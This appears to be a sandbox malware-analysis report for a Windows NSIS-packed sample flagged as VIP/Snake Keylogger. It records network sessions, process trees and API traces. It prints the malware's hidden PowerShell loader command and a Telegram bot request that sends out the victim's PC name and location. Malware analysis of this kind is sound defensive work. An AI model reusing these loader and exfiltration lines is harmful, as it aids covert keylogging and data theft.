2025-01-11 05:31:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49982	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:31:39 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888288 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xC%2FgNt6dP0dh%2BTWSeGe4JEmI7wPcgQxLRaVY3rokCTR0iBsAZsegvvGiIMY55D1wbadM8LOWgndhQYJGPZAVA%2FInbUDSQy9swjQGO2ryDWBPnC%2FpV2mPsZReUr0PBEOTCUN7njov"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90028592bb03727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2001&rtt_var=756&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1442687&cwnd=234&unsent_bytes=0&cid=04c88c6ee17eb154&ts=161&x=0"
2025-01-11 05:31:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49984	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:31:40 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888289 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvjLFy8%2F8bcVje8%2BO79IlaO7dzJh2awSKLcfCLGgFTA1Wr%2BrbAOVfA03S23FV7WOEOQ%2FJ8NL3tdfaBMEqyzs6jvZV8X2h%2FJLxforNZJ0hSbV1aAS6vbe3IHCnL3MJBkwps16NBsi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9002859a2fb70f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1557&rtt_var=656&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1580942&cwnd=221&unsent_bytes=0&cid=dfc71c6db4171522&ts=151&x=0"
2025-01-11 05:31:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49986	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:31:41 UTC	865	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888290 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xYLRzV6zghUKvT%2Btud9AgmJp8%2FCGIe8si%2FkYOBmgVZF9ocImxeYul7hvpfMtNdeOksHYo7H2DMDS%2BdEe20are4%2FBuNhgEGLM32idX%2B%2BhbaowXhrnL391ZkTHM%2BKlOBIouu2ngbkz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900285a228de43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1524&rtt_var=593&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1813664&cwnd=203&unsent_bytes=0&cid=2012ac383f3d486e&ts=143&x=0"
2025-01-11 05:31:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49988	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:31:43 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888292 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2BUYf4j8L5HiNQs7KLRV7QFadweEnjlJHIrSJpLpK6Fduipy%2FtMfP9bUl6Ou9bf7C2436YqvD6yBU2WhrgWsZzOL6SnNdsIjpFw5CKG2Q3NwVPw6zGmj%2BibXA%2FRTsqqIpLhQekno"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900285ab596c729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1900&min_rtt=1890&rtt_var=730&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1476985&cwnd=169&unsent_bytes=0&cid=62cbec3f4cf7eaf1&ts=160&x=0"
2025-01-11 05:31:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49990	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:44 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:31:44 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888293 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LukvoP%2ByeDC6VWXRLODsrqN8iGv3e1vNRZhuFJfnpzxX4aM4zNXIxiusn0IZ2hI%2FCRu4%2BFp%2FRWezx7nvWpLV0OZutnq1SWLqTu8oeAxZzAxZe%2BAAxNPJi3deEqnkiDCqGj4aNSvd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900285b2bb490f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1562&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1802469&cwnd=221&unsent_bytes=0&cid=52b1d88a8061e955&ts=134&x=0"
2025-01-11 05:31:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49992	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:45 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:31:45 UTC	863	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888294 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQ%2BZjrXJxTU7ocvtjHSudQ5ziuQ8oe2%2F25CPjkNfY%2BYs%2B%2BSsfqD2tOwPaaT8IPvkdevei%2B2dG4XYrMMbg%2BGAm23FXmYiYMpfoz8VXS1iSaGcdJkm4bacJKglvuXubjJnL5BKQoxf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900285bb8bccc34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1497&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1950567&cwnd=181&unsent_bytes=0&cid=2980ebfff3147d2d&ts=139&x=0"
2025-01-11 05:31:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49994	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:46 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:31:47 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888296 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AUdBtjfir3PaPXyPInxurnKEYE9v0saOZ%2FKKDPxpM0pA1E2g4iNbyywEla%2BZIu%2BUmOIb%2BazF7HAlbKA4L5eA8Yng0hbj4wWpjbBZuLMmH95QAvrlaqcvjVIrCAeNb3Xxna4FbW04"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900285c2dc97424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1554&rtt_var=589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1849271&cwnd=248&unsent_bytes=0&cid=6ba6583041004b1c&ts=147&x=0"
2025-01-11 05:31:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49995	149.154.167.220	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:47 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2011/01/2025%20/%2014:41:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-11 05:31:47 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 05:31:47 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 05:31:47 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	1
Start time:	00:30:22
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\lkETeneRL3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lkETeneRL3.exe"
Imagebase:	0x400000
File size:	574'016 bytes
MD5 hash:	21EB0BFD14E8AB29A3C29D5B60EE09E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:30:23
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) "
Imagebase:	0x590000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:30:23
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:06:26
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x4d0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2582989409.0000000021733000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.7%
Total number of Nodes:	1276
Total number of Limit Nodes:	37

Executed Functions

Function 0040322B Relevance: 94.9, APIs: 34, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403250
GetVersion.KERNEL32 ref: 00403256
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
#17.COMCTL32(00000007,00000009), ref: 004032A1
OleInitialize.OLE32(00000000), ref: 004032A8
SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\lkETeneRL3.exe",00000000), ref: 004032EC
CharNextA.USER32(00000000,"C:\Users\user\Desktop\lkETeneRL3.exe",00000020), ref: 00403317
GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 00403414
GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 00403425
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403431
GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403445
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040344D
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040345E
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403466
DeleteFileA.KERNELBASE(1033), ref: 0040347A

Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229

ExitProcess.KERNEL32(?), ref: 00403523
CoUninitialize.COMBASE(?), ref: 00403528
ExitProcess.KERNEL32 ref: 00403549
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
ExitProcess.KERNEL32 ref: 004036EB

Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4

Strings

Low, xrefs: 00403447
"C:\Users\user\Desktop\lkETeneRL3.exe", xrefs: 004032DF, 004032E5, 0040349E
.tmp, xrefs: 00403570
1033, xrefs: 00403475
Error launching installer, xrefs: 004034E0
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 004033F9, 004034FA, 004035A4, 004035AD
~nsu, xrefs: 00403554
", xrefs: 0040333C
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040323F
error, xrefs: 004035BB
C:\Users\user\Desktop\lkETeneRL3.exe, xrefs: 00403606
NSIS Error, xrefs: 004032CA
